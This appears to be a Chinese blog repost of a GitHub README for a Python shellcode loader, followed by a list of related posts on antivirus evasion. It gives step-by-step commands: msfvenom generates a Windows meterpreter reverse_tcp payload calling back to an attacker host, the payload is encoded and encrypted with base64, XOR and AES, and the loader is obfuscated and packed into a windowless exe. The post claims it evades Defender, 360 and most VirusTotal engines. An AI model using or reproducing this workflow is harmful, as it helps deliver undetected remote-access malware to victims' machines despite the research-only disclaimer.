项目作者：HZzz2

项目地址：https://github.com/HZzz2/python-shellcode-loader

一、工具介绍

免杀方式 msfvenom生成raw格式的shellcode–>base64–>XOR–>AES

将python代码缩小并混淆最后生成exe

目前过DF、360和火绒 virustotal：7/66过卡巴斯基、迈克菲等

二.安装与使用

1.获取项目

git clone https://github.com/HZzz2/python-shellcode-loader.git
cd python-shellcode-loader
pip install -r requirements.txt

2.生成shellcode

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=9999 -f raw > rev.raw

3.base64编码shellcode并替换jiami.py中的值

base64 -w 0 -i rev.raw > rev.bs64
cat rev.bs64
复制base64的值替换jiami.py中payload 也就是 第二十四行 sc='payload'

4、加密base64并替换main.py中的值

#加密base64后的shellcode
python3 jiami.py
#会生成一个aes-xor.txt的文件，复制文件里的值(经过XOR和AES加密后)复制的值替换main.py中的payload 也就是第四十一行 jiami_sc='payload'

5.缩小和混淆py代码

缩小python代码
pyminify main.py --output main-mini.py
混淆main-mini.py中的python代码
https://pyob.oxyry.com/ 在线混淆

将混淆后的代码保存到一个文件中，比如文件名为:main-mini-ob.py

6、打包成可执行文件exe

这里需要先安装模块tinyaes

#打包成exe
pyinstaller.exe -Fw -i .setting.ico --key=leslie .main-mini-ob.py
-F 打包为单文件 -w 不显示窗口 -i ico图标文件 --key 加密字节码的密钥等待打包完成。。。。打包好后的可执行程序在dist目录中

免杀结果

免责声明

仅供安全研究与教学之用，如果使用者将其做其他用途，由使用者承担全部法律及连带责任，本人不承担任何法律及连带责任。

所谓宿命，其实都是最好的安排。

免杀方法（四）Python免杀shellcode加载器相关推荐

1. 免杀方法（七）c#xor加载器

   c#是很流行的编程语言,也可以用它来做一个加载器运行shellcode,生成出来的 文件特别的小,可以很好的投递传输. 项目地址https://github.com/antman1p/ShellCod ...

2. 免杀方法（十）GO免杀shellcode加载器 — go-shellcode-loader​

   项目作者:HZzz 项目地址:https://github.com/HZzz2/go-shellcode-loader 一.工具介绍 GO混淆免杀shellcode加载器AES加密,混淆反检测 过DF ...

3. ShellCode_Loader - MsfCobaltStrike免杀ShellCode加载器加密工具

   ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器&加密工具 文章目录 ShellCode_Loader - Msf&Cobal ...

4. 【工具分享】免杀360火绒的shellcode加载器

   微信公众号:乌鸦安全 扫取二维码获取更多信息! 1. 免杀效果 该shellcode加载器目前可以过360&火绒,Windows Defender没戏... 代码和思路暂不开源! 你可以在我的 ...

5. java 加载shellcode_通用Shellcode加载器

   Shellcode加载器是一种基本的规避技术.尽管shellcode加载器通常可以促进payload的初始执行,但是启发式检测方法仍可以标记payload的其他方面和行为.例如,很多安全产品可能会在内 ...

6. 网络安全进阶篇之免杀（十四章-5） Golang加载器CS免杀国内主流杀软

   文章目录 一. 概念 1.1 360 安全卫士和 360 杀毒 1.2 Golang 二.前期准备 2.1 下载地址 三.具体过程 3.1 使用CS生成payload 3.2 免杀过程 3.3 测试 ...

7. 网络安全进阶篇之免杀（十四章-7）C#加载器过360

   一. 概念 1.1 360 安全卫士和 360 杀毒 360 杀毒是 360 安全中心出品的一款免费的云安全杀毒软件.它创新性地整合了五大领先查杀引擎,包括国际知名的 BitDefender 病毒查杀 ...

8. shellcode加载器

   不能有全局变量 (其实也是使用了绝对地址) 不能使用常量字符串 char szBuffer[] = "ShellCode"; //会使用常量区,所以不可用//写成 char szB ...

9. shellcode加载器--从入门到放弃

   文章目录 重剑无锋--代码篇复现 1.C/C++(vs2019) (1).指针执行 shellcode放在data段 shellcode放在栈上,复制到堆上 shellcode放在web服务器上 使用 ...

最新文章

1. 解决dubbo问题：forbid consumer（2）
2. 石嘴山考计算机在哪里报名,石嘴山中考报名系统
3. Python3基础 if __name__ == '__main__'
4. 深入理解JavaScript之Event Loop
5. oozie mysql_【oozie】将oozie的数据库配置为mysql | 学步园
6. 文本备份云仓库-python实用脚本下载
7. JavaScript获取地址栏中的链接参数
8. 程序员必备之电脑护眼模式设置
9. Windows系统运行VirtualBox一直出现0x00000000指令引用的0x00000000内存该内存不能为written
10. iOS GUI 规范
11. 爬虫120例之第17例，用Python面向对象的思路，采集各种精彩句子
12. [Ansible系列②]Ansible使用说明
13. 十进制数与8421码、5421码、2421码以及余3码之间的部分转换
14. Kubernetes API Server 准入控制
15. 通过百度地图把经纬度转化成城市名
16. Android Glide加载gif
17. 新手教程 | 手把手教你 谷歌浏览器如何使用HTTP代理？
18. HBase Random Read性能测试
19. 浅析丨中国院落文化，打造中式装修风尚！
20. 得物APP鞋子包包等商品链接采集--入门版（1）

热门文章

1. js 判断视频编码格式是不是avc格式的
2. C C++基础的Java教程
3. 如何清除电脑里的服务项和系统服务列表中的残留服务
4. 2022-2028年中国仓储管理系统行业市场深度分析及投资前景展望报告
5. EndnoteX9 打开闪退问题
6. 使用批处理文件 安装和卸载Windows服务
7. 嵌入式Linux 多线程串口通讯
8. SVN server 服务端修改端口号
9. UNI-APP开发工具与环境
10. mysql(Navicat)数据库报错1166